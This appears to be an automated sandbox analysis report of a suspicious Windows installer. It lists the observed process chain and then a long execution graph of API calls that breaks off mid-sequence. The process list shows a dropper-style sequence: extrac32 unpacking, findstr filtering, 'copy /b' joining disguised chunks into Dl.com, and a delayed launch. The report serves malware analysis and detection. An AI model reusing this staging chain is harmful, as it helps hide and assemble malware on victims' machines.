                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c md 755831
                                                                  Imagebase:0x790000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:9
                                                                  Start time:10:01:22
                                                                  Start date:15/01/2025
                                                                  Path:C:\Windows\SysWOW64\extrac32.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:extrac32 /Y /E Delhi
                                                                  Imagebase:0xdc0000
                                                                  File size:29'184 bytes
                                                                  MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:10
                                                                  Start time:10:01:22
                                                                  Start date:15/01/2025
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr /V "jerusalem" Bangladesh
                                                                  Imagebase:0x270000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:11
                                                                  Start time:10:01:22
                                                                  Start date:15/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c copy /b 755831\Dl.com + Warriors + Spas + Douglas + Sport + Msg + Garmin + Frederick + Barbados + Sv 755831\Dl.com
                                                                  Imagebase:0x790000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:12
                                                                  Start time:10:01:22
                                                                  Start date:15/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c copy /b ..\Fw + ..\Brighton + ..\Earliest + ..\Heritage + ..\Claim + ..\Vg + ..\Hardcover + ..\Appropriate g
                                                                  Imagebase:0x790000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:13
                                                                  Start time:10:01:23
                                                                  Start date:15/01/2025
                                                                  Path:C:\Users\user\AppData\Local\Temp\755831\Dl.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:Dl.com g
                                                                  Imagebase:0xb70000
                                                                  File size:947'288 bytes
                                                                  MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 0%, ReversingLabs
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:14
                                                                  Start time:10:01:23
                                                                  Start date:15/01/2025
                                                                  Path:C:\Windows\SysWOW64\choice.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:choice /d y /t 5
                                                                  Imagebase:0x2b0000
                                                                  File size:28'160 bytes
                                                                  MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:17.8%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:20.7%
                                                                    Total number of Nodes:1526
                                                                    Total number of Limit Nodes:33
                                                                    execution_graph 4342 402fc0 4343 401446 18 API calls 4342->4343 4344 402fc7 4343->4344 4345 403017 4344->4345 4346 40300a 4344->4346 4349 401a13 4344->4349 4347 406805 18 API calls 4345->4347 4348 401446 18 API calls 4346->4348 4347->4349 4348->4349 4350 4023c1 4351 40145c 18 API calls 4350->4351 4352 4023c8 4351->4352 4355 40726a 4352->4355 4358 406ed2 CreateFileW 4355->4358 4359 406f04 4358->4359 4360 406f1e ReadFile 4358->4360 4361 4062a3 11 API calls 4359->4361 4362 4023d6 4360->4362 4365 406f84 4360->4365 4361->4362 4363 4071e3 CloseHandle 4363->4362 4364 406f9b ReadFile lstrcpynA lstrcmpA 4364->4365 4366 406fe2 SetFilePointer ReadFile 4364->4366 4365->4362 4365->4363 4365->4364 4369 406fdd 4365->4369 4366->4363 4367 4070a8 ReadFile 4366->4367 4368 407138 4367->4368 4368->4367 4368->4369 4370 40715f SetFilePointer GlobalAlloc ReadFile 4368->4370 4369->4363 4371 4071a3 4370->4371 4372 4071bf lstrcpynW GlobalFree 4370->4372 4371->4371 4371->4372 4372->4363 4373 401cc3 4374 40145c 18 API calls 4373->4374 4375 401cca lstrlenW 4374->4375 4376 4030dc 4375->4376 4377 4030e3 4376->4377 4379 405f51 wsprintfW 4376->4379 4379->4377 4394 401c46 4395 40145c 18 API calls 4394->4395 4396 401c4c 4395->4396 4397 4062a3 11 API calls 4396->4397 4398 401c59 4397->4398 4399 406c9b 81 API calls 4398->4399 4400 401c64 4399->4400 4401 403049 4402 401446 18 API calls 4401->4402 4405 403050 4402->4405 4403 406805 18 API calls 4404 401a13 4403->4404 4405->4403 4405->4404 4406 40204a 4407 401446 18 API calls 4406->4407 4408 402051 IsWindow 4407->4408 4409 4018d3 4408->4409 4410 40324c 4411 403277 4410->4411 4412 40325e SetTimer 4410->4412 4413 4032cc 4411->4413 4414 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4411->4414 4412->4411 4414->4413 4415 4048cc 4416 4048f1 4415->4416 4417 4048da 4415->4417 4419 4048ff IsWindowVisible 4416->4419 4423 404916 4416->4423 4418 4048e0 4417->4418 4433 40495a 4417->4433 4420 403daf SendMessageW 4418->4420 4422 40490c 4419->4422 4419->4433 4424 4048ea 4420->4424 4421 404960 CallWindowProcW 4421->4424 4434 40484e SendMessageW 4422->4434 4423->4421 4439 406009 lstrcpynW 4423->4439 4427 404945 4440 405f51 wsprintfW 4427->4440 4429 40494c 4430 40141d 80 API calls 4429->4430 4431 404953 4430->4431 4441 406009 lstrcpynW 4431->4441 4433->4421 4435 404871 GetMessagePos ScreenToClient SendMessageW 4434->4435 4436 4048ab SendMessageW 4434->4436 4437 4048a3 4435->4437 4438 4048a8 4435->4438 4436->4437 4437->4423 4438->4436 4439->4427 4440->4429 4441->4433 4442 4022cc 4443 40145c 18 API calls 4442->4443 4444 4022d3 4443->4444 4445 4062d5 2 API calls 4444->4445 4446 4022d9 4445->4446 4447 4022e8 4446->4447 4451 405f51 wsprintfW 4446->4451 4450 4030e3 4447->4450 4452 405f51 wsprintfW 4447->4452 4451->4447 4452->4450 4222 4050cd 4223 405295 4222->4223 4224 4050ee GetDlgItem GetDlgItem GetDlgItem 4222->4224 4225 4052c6 4223->4225 4226 40529e GetDlgItem CreateThread CloseHandle 4223->4226 4271 403d98 SendMessageW 4224->4271 4228 4052f4 4225->4228 4230 4052e0 ShowWindow ShowWindow 4225->4230 4231 405316 4225->4231 4226->4225 4274 405047 83 API calls 4226->4274 4232 405352 4228->4232 4234 405305 4228->4234 4235 40532b ShowWindow 4228->4235 4229 405162 4242 406805 18 API calls 4229->4242 4273 403d98 SendMessageW 4230->4273 4236 403dca 8 API calls 4231->4236 4232->4231 4237 40535d SendMessageW 4232->4237 4238 403d18 SendMessageW 4234->4238 4240 40534b 4235->4240 4241 40533d 4235->4241 4239 40528e 4236->4239 4237->4239 4244 405376 CreatePopupMenu 4237->4244 4238->4231 4243 403d18 SendMessageW 4240->4243 4245 404f72 25 API calls 4241->4245 4246 405181 4242->4246 4243->4232 4247 406805 18 API calls 4244->4247 4245->4240 4248 4062a3 11 API calls 4246->4248 4250 405386 AppendMenuW 4247->4250 4249 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4248->4249 4251 4051f3 4249->4251 4252 4051d7 SendMessageW SendMessageW 4249->4252 4253 405399 GetWindowRect 4250->4253 4254 4053ac 4250->4254 4255 405206 4251->4255 4256 4051f8 SendMessageW 4251->4256 4252->4251 4257 4053b3 TrackPopupMenu 4253->4257 4254->4257 4258 403d3f 19 API calls 4255->4258 4256->4255 4257->4239 4259 4053d1 4257->4259 4260 405216 4258->4260 4261 4053ed SendMessageW 4259->4261 4262 405253 GetDlgItem SendMessageW 4260->4262 4263 40521f ShowWindow 4260->4263 4261->4261 4264 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4261->4264 4262->4239 4267 405276 SendMessageW SendMessageW 4262->4267 4265 405242 4263->4265 4266 405235 ShowWindow 4263->4266 4268 40542f SendMessageW 4264->4268 4272 403d98 SendMessageW 4265->4272 4266->4265 4267->4239 4268->4268 4269 40545a GlobalUnlock SetClipboardData CloseClipboard 4268->4269 4269->4239 4271->4229 4272->4262 4273->4228 4453 4030cf 4454 40145c 18 API calls 4453->4454 4455 4030d6 4454->4455 4457 4030dc 4455->4457 4460 4063ac GlobalAlloc lstrlenW 4455->4460 4458 4030e3 4457->4458 4487 405f51 wsprintfW 4457->4487 4461 4063e2 4460->4461 4462 406434 4460->4462 4463 40640f GetVersionExW 4461->4463 4488 40602b CharUpperW 4461->4488 4462->4457 4463->4462 4464 40643e 4463->4464 4465 406464 LoadLibraryA 4464->4465 4466 40644d 4464->4466 4465->4462 4469 406482 GetProcAddress GetProcAddress GetProcAddress 4465->4469 4466->4462 4468 406585 GlobalFree 4466->4468 4470 40659b LoadLibraryA 4468->4470 4471 4066dd FreeLibrary 4468->4471 4474 4064aa 4469->4474 4477 4065f5 4469->4477 4470->4462 4473 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4470->4473 4471->4462 4472 406651 FreeLibrary 4481 40662a 4472->4481 4473->4477 4475 4064ce FreeLibrary GlobalFree 4474->4475 4474->4477 4483 4064ea 4474->4483 4475->4462 4476 4066ea 4479 4066ef CloseHandle FreeLibrary 4476->4479 4477->4472 4477->4481 4478 4064fc lstrcpyW OpenProcess 4480 40654f CloseHandle CharUpperW lstrcmpW 4478->4480 4478->4483 4482 406704 CloseHandle 4479->4482 4480->4477 4480->4483 4481->4476 4484 406685 lstrcmpW 4481->4484 4485 4066b6 CloseHandle 4481->4485 4486 4066d4 CloseHandle 4481->4486 4482->4479 4483->4468 4483->4478 4483->4480 4484->4481 4484->4482 4485->4481 4486->4471 4487->4458 4488->4461 4489 407752 4493 407344 4489->4493 4490 407c6d 4491 4073c2 GlobalFree 4492 4073cb GlobalAlloc 4491->4492 4492->4490 4492->4493 4493->4490 4493->4491 4493->4492 4493->4493 4494 407443 GlobalAlloc 4493->4494 4495 40743a GlobalFree 4493->4495 4494->4490 4494->4493 4495->4494 4496 401dd3 4497 401446 18 API calls 4496->4497 4498 401dda 4497->4498 4499 401446 18 API calls 4498->4499 4500 4018d3 4499->4500 4508 402e55 4509 40145c 18 API calls 4508->4509 4510 402e63 4509->4510 4511 402e79 4510->4511 4512 40145c 18 API calls 4510->4512 4513 405e30 2 API calls 4511->4513 4512->4511 4514 402e7f 4513->4514 4538 405e50 GetFileAttributesW CreateFileW 4514->4538 4516 402e8c 4517 402f35 4516->4517 4518 402e98 GlobalAlloc 4516->4518 4521 4062a3 11 API calls 4517->4521 4519 402eb1 4518->4519 4520 402f2c CloseHandle 4518->4520 4539 403368 SetFilePointer 4519->4539 4520->4517 4523 402f45 4521->4523 4525 402f50 DeleteFileW 4523->4525 4526 402f63 4523->4526 4524 402eb7 4528 403336 ReadFile 4524->4528 4525->4526 4540 401435 4526->4540 4529 402ec0 GlobalAlloc 4528->4529 4530 402ed0 4529->4530 4531 402f04 WriteFile GlobalFree 4529->4531 4532 40337f 37 API calls 4530->4532 4533 40337f 37 API calls 4531->4533 4537 402edd 4532->4537 4534 402f29 4533->4534 4534->4520 4536 402efb GlobalFree 4536->4531 4537->4536 4538->4516 4539->4524 4541 404f72 25 API calls 4540->4541 4542 401443 4541->4542 4543 401cd5 4544 401446 18 API calls 4543->4544 4545 401cdd 4544->4545 4546 401446 18 API calls 4545->4546 4547 401ce8 4546->4547 4548 40145c 18 API calls 4547->4548 4549 401cf1 4548->4549 4550 401d07 lstrlenW 4549->4550 4551 401d43 4549->4551 4552 401d11 4550->4552 4552->4551 4556 406009 lstrcpynW 4552->4556 4554 401d2c 4554->4551 4555 401d39 lstrlenW 4554->4555 4555->4551 4556->4554 4557 403cd6 4558 403ce1 4557->4558 4559 403ce5 4558->4559 4560 403ce8 GlobalAlloc 4558->4560 4560->4559 4561 402cd7 4562 401446 18 API calls 4561->4562 4565 402c64 4562->4565 4563 402d99 4564 402d17 ReadFile 4564->4565 4565->4561 4565->4563 4565->4564 4566 402dd8 4567 402ddf 4566->4567 4568 4030e3 4566->4568 4569 402de5 FindClose 4567->4569 4569->4568 4570 401d5c 4571 40145c 18 API calls 4570->4571 4572 401d63 4571->4572 4573 40145c 18 API calls 4572->4573 4574 401d6c 4573->4574 4575 401d73 lstrcmpiW 4574->4575 4576 401d86 lstrcmpW 4574->4576 4577 401d79 4575->4577 4576->4577 4578 401c99 4576->4578 4577->4576 4577->4578 4280 407c5f 4281 407344 4280->4281 4282 4073c2 GlobalFree 4281->4282 4283 4073cb GlobalAlloc 4281->4283 4284 407c6d 4281->4284 4285 407443 GlobalAlloc 4281->4285 4286 40743a GlobalFree 4281->4286 4282->4283 4283->4281 4283->4284 4285->4281 4285->4284 4286->4285 4579 404363 4580 404373 4579->4580 4581 40439c 4579->4581 4583 403d3f 19 API calls 4580->4583 4582 403dca 8 API calls 4581->4582 4584 4043a8 4582->4584 4585 404380 SetDlgItemTextW 4583->4585 4585->4581 4586 4027e3 4587 4027e9 4586->4587 4588 4027f2 4587->4588 4589 402836 4587->4589 4602 401553 4588->4602 4590 40145c 18 API calls 4589->4590 4592 40283d 4590->4592 4594 4062a3 11 API calls 4592->4594 4593 4027f9 4595 40145c 18 API calls 4593->4595 4600 401a13 4593->4600 4596 40284d 4594->4596 4597 40280a RegDeleteValueW 4595->4597 4606 40149d RegOpenKeyExW 4596->4606 4598 4062a3 11 API calls 4597->4598 4601 40282a RegCloseKey 4598->4601 4601->4600 4603 401563 4602->4603 4604 40145c 18 API calls 4603->4604 4605 401589 RegOpenKeyExW 4604->4605 4605->4593 4612 401515 4606->4612 4614 4014c9 4606->4614 4607 4014ef RegEnumKeyW 4608 401501 RegCloseKey 4607->4608 4607->4614 4609 4062fc 3 API calls 4608->4609 4611 401511 4609->4611 4610 401526 RegCloseKey 4610->4612 4611->4612 4615 401541 RegDeleteKeyW 4611->4615 4612->4600 4613 40149d 3 API calls 4613->4614 4614->4607 4614->4608 4614->4610 4614->4613 4615->4612 4616 403f64 4617 403f90 4616->4617 4618 403f74 4616->4618 4620 403fc3 4617->4620 4621 403f96 SHGetPathFromIDListW 4617->4621 4627 405c84 GetDlgItemTextW 4618->4627 4623 403fad SendMessageW 4621->4623 4624 403fa6 4621->4624 4622 403f81 SendMessageW 4622->4617 4623->4620 4625 40141d 80 API calls 4624->4625 4625->4623 4627->4622 4628 402ae4 4629 402aeb 4628->4629 4630 4030e3 4628->4630 4631 402af2 CloseHandle 4629->4631 4631->4630 4632 402065 4633 401446 18 API calls 4632->4633 4634 40206d 4633->4634 4635 401446 18 API calls 4634->4635 4636 402076 GetDlgItem 4635->4636 4637 4030dc 4636->4637 4638 4030e3 4637->4638 4640 405f51 wsprintfW 4637->4640 4640->4638 4641 402665 4642 40145c 18 API calls 4641->4642 4643 40266b 4642->4643 4644 40145c 18 API calls 4643->4644 4645 402674 4644->4645 4646 40145c 18 API calls 4645->4646 4647 40267d 4646->4647 4648 4062a3 11 API calls 4647->4648 4649 40268c 4648->4649 4650 4062d5 2 API calls 4649->4650 4651 402695 4650->4651 4652 4026a6 lstrlenW lstrlenW 4651->4652 4653 404f72 25 API calls 4651->4653 4656 4030e3 4651->4656 4654 404f72 25 API calls 4652->4654 4653->4651 4655 4026e8 SHFileOperationW 4654->4655 4655->4651 4655->4656 4664 401c69 4665 40145c 18 API calls 4664->4665 4666 401c70 4665->4666 4667 4062a3 11 API calls 4666->4667 4668 401c80 4667->4668 4669 405ca0 MessageBoxIndirectW 4668->4669 4670 401a13 4669->4670 4678 402f6e 4679 402f72 4678->4679 4680 402fae 4678->4680 4681 4062a3 11 API calls 4679->4681 4682 40145c 18 API calls 4680->4682 4683 402f7d 4681->4683 4688 402f9d 4682->4688 4684 4062a3 11 API calls 4683->4684 4685 402f90 4684->4685 4686 402fa2 4685->4686 4687 402f98 4685->4687 4690 4060e7 9 API calls 4686->4690 4689 403e74 5 API calls 4687->4689 4689->4688 4690->4688 4691 4023f0 4692 402403 4691->4692 4693 4024da 4691->4693 4694 40145c 18 API calls 4692->4694 4695 404f72 25 API calls 4693->4695 4696 40240a 4694->4696 4701 4024f1 4695->4701 4697 40145c 18 API calls 4696->4697 4698 402413 4697->4698 4699 402429 LoadLibraryExW 4698->4699 4700 40241b GetModuleHandleW 4698->4700 4702 40243e 4699->4702 4703 4024ce 4699->4703 4700->4699 4700->4702 4715 406365 GlobalAlloc WideCharToMultiByte 4702->4715 4704 404f72 25 API calls 4703->4704 4704->4693 4706 402449 4707 40248c 4706->4707 4708 40244f 4706->4708 4709 404f72 25 API calls 4707->4709 4711 401435 25 API calls 4708->4711 4713 40245f 4708->4713 4710 402496 4709->4710 4712 4062a3 11 API calls 4710->4712 4711->4713 4712->4713 4713->4701 4714 4024c0 FreeLibrary 4713->4714 4714->4701 4716 406390 GetProcAddress 4715->4716 4717 40639d GlobalFree 4715->4717 4716->4717 4717->4706 4718 402df3 4719 402dfa 4718->4719 4721 4019ec 4718->4721 4720 402e07 FindNextFileW 4719->4720 4720->4721 4722 402e16 4720->4722 4724 406009 lstrcpynW 4722->4724 4724->4721 4077 402175 4078 401446 18 API calls 4077->4078 4079 40217c 4078->4079 4080 401446 18 API calls 4079->4080 4081 402186 4080->4081 4082 4062a3 11 API calls 4081->4082 4086 402197 4081->4086 4082->4086 4083 4021aa EnableWindow 4085 4030e3 4083->4085 4084 40219f ShowWindow 4084->4085 4086->4083 4086->4084 4732 404077 4733 404081 4732->4733 4734 404084 lstrcpynW lstrlenW 4732->4734 4733->4734 4103 405479 4104 405491 4103->4104 4105 4055cd 4103->4105 4104->4105 4106 40549d 4104->4106 4107 40561e 4105->4107 4108 4055de GetDlgItem GetDlgItem 4105->4108 4109 4054a8 SetWindowPos 4106->4109 4110 4054bb 4106->4110 4112 405678 4107->4112 4120 40139d 80 API calls 4107->4120 4111 403d3f 19 API calls 4108->4111 4109->4110 4114 4054c0 ShowWindow 4110->4114 4115 4054d8 4110->4115 4116 405608 SetClassLongW 4111->4116 4113 403daf SendMessageW 4112->4113 4133 4055c8 4112->4133 4143 40568a 4113->4143 4114->4115 4117 4054e0 DestroyWindow 4115->4117 4118 4054fa 4115->4118 4119 40141d 80 API calls 4116->4119 4172 4058dc 4117->4172 4121 405510 4118->4121 4122 4054ff SetWindowLongW 4118->4122 4119->4107 4123 405650 4120->4123 4126 4055b9 4121->4126 4127 40551c GetDlgItem 4121->4127 4122->4133 4123->4112 4128 405654 SendMessageW 4123->4128 4124 40141d 80 API calls 4124->4143 4125 4058de DestroyWindow KiUserCallbackDispatcher 4125->4172 4182 403dca 4126->4182 4131 40554c 4127->4131 4132 40552f SendMessageW IsWindowEnabled 4127->4132 4128->4133 4130 40590d ShowWindow 4130->4133 4135 405559 4131->4135 4136 4055a0 SendMessageW 4131->4136 4137 40556c 4131->4137 4146 405551 4131->4146 4132->4131 4132->4133 4134 406805 18 API calls 4134->4143 4135->4136 4135->4146 4136->4126 4140 405574 4137->4140 4141 405589 4137->4141 4139 403d3f 19 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4145 40141d 80 API calls 4141->4145 4142 405587 4142->4126 4143->4124 4143->4125 4143->4133 4143->4134 4143->4139 4163 40581e DestroyWindow 4143->4163 4173 403d3f 4143->4173 4144->4146 4147 405590 4145->4147 4179 403d18 4146->4179 4147->4126 4147->4146 4149 405705 GetDlgItem 4150 405723 ShowWindow KiUserCallbackDispatcher 4149->4150 4151 40571a 4149->4151 4176 403d85 KiUserCallbackDispatcher 4150->4176 4151->4150 4153 40574d EnableWindow 4156 405761 4153->4156 4154 405766 GetSystemMenu EnableMenuItem SendMessageW 4155 405796 SendMessageW 4154->4155 4154->4156 4155->4156 4156->4154 4177 403d98 SendMessageW 4156->4177 4178 406009 lstrcpynW 4156->4178 4159 4057c4 lstrlenW 4160 406805 18 API calls 4159->4160 4161 4057da SetWindowTextW 4160->4161 4162 40139d 80 API calls 4161->4162 4162->4143 4164 405838 CreateDialogParamW 4163->4164 4163->4172 4165 40586b 4164->4165 4164->4172 4166 403d3f 19 API calls 4165->4166 4167 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4166->4167 4168 40139d 80 API calls 4167->4168 4169 4058bc 4168->4169 4169->4133 4170 4058c4 ShowWindow 4169->4170 4171 403daf SendMessageW 4170->4171 4171->4172 4172->4130 4172->4133 4174 406805 18 API calls 4173->4174 4175 403d4a SetDlgItemTextW 4174->4175 4175->4149 4176->4153 4177->4156 4178->4159 4180 403d25 SendMessageW 4179->4180 4181 403d1f 4179->4181 4180->4142 4181->4180 4183 403ddf GetWindowLongW 4182->4183 4193 403e68 4182->4193 4184 403df0 4183->4184 4183->4193 4185 403e02 4184->4185 4186 403dff GetSysColor 4184->4186 4187 403e12 SetBkMode 4185->4187 4188 403e08 SetTextColor 4185->4188 4186->4185 4189 403e30 4187->4189 4190 403e2a GetSysColor 4187->4190 4188->4187 4191 403e41 4189->4191 4192 403e37 SetBkColor 4189->4192 4190->4189 4191->4193 4194 403e54 DeleteObject 4191->4194 4195 403e5b CreateBrushIndirect 4191->4195 4192->4191 4193->4133 4194->4195 4195->4193 4735 4020f9 GetDC GetDeviceCaps 4736 401446 18 API calls 4735->4736 4737 402116 MulDiv 4736->4737 4738 401446 18 API calls 4737->4738 4739 40212c 4738->4739 4740 406805 18 API calls 4739->4740 4741 402165 CreateFontIndirectW 4740->4741 4742 4030dc 4741->4742 4743 4030e3 4742->4743 4745 405f51 wsprintfW 4742->4745 4745->4743 4746 4024fb 4747 40145c 18 API calls 4746->4747 4748 402502 4747->4748 4749 40145c 18 API calls 4748->4749 4750 40250c 4749->4750 4751 40145c 18 API calls 4750->4751 4752 402515 4751->4752 4753 40145c 18 API calls 4752->4753 4754 40251f 4753->4754 4755 40145c 18 API calls 4754->4755 4756 402529 4755->4756 4757 40253d 4756->4757 4758 40145c 18 API calls 4756->4758 4759 4062a3 11 API calls 4757->4759 4758->4757 4760 40256a CoCreateInstance 4759->4760 4761 40258c 4760->4761 4762 40497c GetDlgItem GetDlgItem 4763 4049d2 7 API calls 4762->4763 4768 404bea 4762->4768 4764 404a76 DeleteObject 4763->4764 4765 404a6a SendMessageW 4763->4765 4766 404a81 4764->4766 4765->4764 4769 404ab8 4766->4769 4771 406805 18 API calls 4766->4771 4767 404ccf 4770 404d74 4767->4770 4775 404bdd 4767->4775 4780 404d1e SendMessageW 4767->4780 4768->4767 4778 40484e 5 API calls 4768->4778 4791 404c5a 4768->4791 4774 403d3f 19 API calls 4769->4774 4772 404d89 4770->4772 4773 404d7d SendMessageW 4770->4773 4777 404a9a SendMessageW SendMessageW 4771->4777 4782 404da2 4772->4782 4783 404d9b ImageList_Destroy 4772->4783 4793 404db2 4772->4793 4773->4772 4779 404acc 4774->4779 4781 403dca 8 API calls 4775->4781 4776 404cc1 SendMessageW 4776->4767 4777->4766 4778->4791 4784 403d3f 19 API calls 4779->4784 4780->4775 4786 404d33 SendMessageW 4780->4786 4787 404f6b 4781->4787 4788 404dab GlobalFree 4782->4788 4782->4793 4783->4782 4789 404add 4784->4789 4785 404f1c 4785->4775 4794 404f31 ShowWindow GetDlgItem ShowWindow 4785->4794 4790 404d46 4786->4790 4788->4793 4792 404baa GetWindowLongW SetWindowLongW 4789->4792 4801 404ba4 4789->4801 4804 404b39 SendMessageW 4789->4804 4805 404b67 SendMessageW 4789->4805 4806 404b7b SendMessageW 4789->4806 4800 404d57 SendMessageW 4790->4800 4791->4767 4791->4776 4795 404bc4 4792->4795 4793->4785 4796 404de4 4793->4796 4799 40141d 80 API calls 4793->4799 4794->4775 4797 404be2 4795->4797 4798 404bca ShowWindow 4795->4798 4809 404e12 SendMessageW 4796->4809 4812 404e28 4796->4812 4814 403d98 SendMessageW 4797->4814 4813 403d98 SendMessageW 4798->4813 4799->4796 4800->4770 4801->4792 4801->4795 4804->4789 4805->4789 4806->4789 4807 404ef3 InvalidateRect 4807->4785 4808 404f09 4807->4808 4815 4043ad 4808->4815 4809->4812 4811 404ea1 SendMessageW SendMessageW 4811->4812 4812->4807 4812->4811 4813->4775 4814->4768 4816 4043cd 4815->4816 4817 406805 18 API calls 4816->4817 4818 40440d 4817->4818 4819 406805 18 API calls 4818->4819 4820 404418 4819->4820 4821 406805 18 API calls 4820->4821 4822 404428 lstrlenW wsprintfW SetDlgItemTextW 4821->4822 4822->4785 4823 4026fc 4824 401ee4 4823->4824 4826 402708 4823->4826 4824->4823 4825 406805 18 API calls 4824->4825 4825->4824 4275 4019fd 4276 40145c 18 API calls 4275->4276 4277 401a04 4276->4277 4278 405e7f 2 API calls 4277->4278 4279 401a0b 4278->4279 4827 4022fd 4828 40145c 18 API calls 4827->4828 4829 402304 GetFileVersionInfoSizeW 4828->4829 4830 40232b GlobalAlloc 4829->4830 4834 4030e3 4829->4834 4831 40233f GetFileVersionInfoW 4830->4831 4830->4834 4832 402350 VerQueryValueW 4831->4832 4833 402381 GlobalFree 4831->4833 4832->4833 4836 402369 4832->4836 4833->4834 4840 405f51 wsprintfW 4836->4840 4838 402375 4841 405f51 wsprintfW 4838->4841 4840->4838 4841->4833 4842 402afd 4843 40145c 18 API calls 4842->4843 4844 402b04 4843->4844 4849 405e50 GetFileAttributesW CreateFileW 4844->4849 4846 402b10 4847 4030e3 4846->4847 4850 405f51 wsprintfW 4846->4850 4849->4846 4850->4847 4851 4029ff 4852 401553 19 API calls 4851->4852 4853 402a09 4852->4853 4854 40145c 18 API calls 4853->4854 4855 402a12 4854->4855 4856 402a1f RegQueryValueExW 4855->4856 4858 401a13 4855->4858 4857 402a3f 4856->4857 4861 402a45 4856->4861 4857->4861 4862 405f51 wsprintfW 4857->4862 4860 4029e4 RegCloseKey 4860->4858 4861->4858 4861->4860 4862->4861 4863 401000 4864 401037 BeginPaint GetClientRect 4863->4864 4865 40100c DefWindowProcW 4863->4865 4867 4010fc 4864->4867 4868 401182 4865->4868 4869 401073 CreateBrushIndirect FillRect DeleteObject 4867->4869 4870 401105 4867->4870 4869->4867 4871 401170 EndPaint 4870->4871 4872 40110b CreateFontIndirectW 4870->4872 4871->4868 4872->4871 4873 40111b 6 API calls 4872->4873 4873->4871 4874 401f80 4875 401446 18 API calls 4874->4875 4876 401f88 4875->4876 4877 401446 18 API calls 4876->4877 4878 401f93 4877->4878 4879 401fa3 4878->4879 4880 40145c 18 API calls 4878->4880 4881 401fb3 4879->4881 4882 40145c 18 API calls 4879->4882 4880->4879 4883 402006 4881->4883 4884 401fbc 4881->4884 4882->4881 4886 40145c 18 API calls 4883->4886 4885 401446 18 API calls 4884->4885 4888 401fc4 4885->4888 4887 40200d 4886->4887 4889 40145c 18 API calls 4887->4889 4890 401446 18 API calls 4888->4890 4891 402016 FindWindowExW 4889->4891 4892 401fce 4890->4892 4896 402036 4891->4896 4893 401ff6 SendMessageW 4892->4893 4894 401fd8 SendMessageTimeoutW 4892->4894 4893->4896 4894->4896 4895 4030e3 4896->4895 4898 405f51 wsprintfW 4896->4898 4898->4895 4899 402880 4900 402884 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028a7 4901->4902 4903 40145c 18 API calls 4902->4903 4904 4028b1 4903->4904 4905 4028ba RegCreateKeyExW 4904->4905 4906 4028e8 4905->4906 4913 4029ef 4905->4913 4907 402934 4906->4907 4908 40145c 18 API calls 4906->4908 4909 402963 4907->4909 4912 401446 18 API calls 4907->4912 4911 4028fc lstrlenW 4908->4911 4910 4029ae RegSetValueExW 4909->4910 4914 40337f 37 API calls 4909->4914 4917 4029c6 RegCloseKey 4910->4917 4918 4029cb 4910->4918 4915 402918 4911->4915 4916 40292a 4911->4916 4919 402947 4912->4919 4920 40297b 4914->4920 4921 4062a3 11 API calls 4915->4921 4922 4062a3 11 API calls 4916->4922 4917->4913 4923 4062a3 11 API calls 4918->4923 4924 4062a3 11 API calls 4919->4924 4930 406224 4920->4930 4926 402922 4921->4926 4922->4907 4923->4917 4924->4909 4926->4910 4929 4062a3 11 API calls 4929->4926 4931 406247 4930->4931 4932 40628a 4931->4932 4933 40625c wsprintfW 4931->4933 4934 402991 4932->4934 4935 406293 lstrcatW 4932->4935 4933->4932 4933->4933 4934->4929 4935->4934 4936 402082 4937 401446 18 API calls 4936->4937 4938 402093 SetWindowLongW 4937->4938 4939 4030e3 4938->4939 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 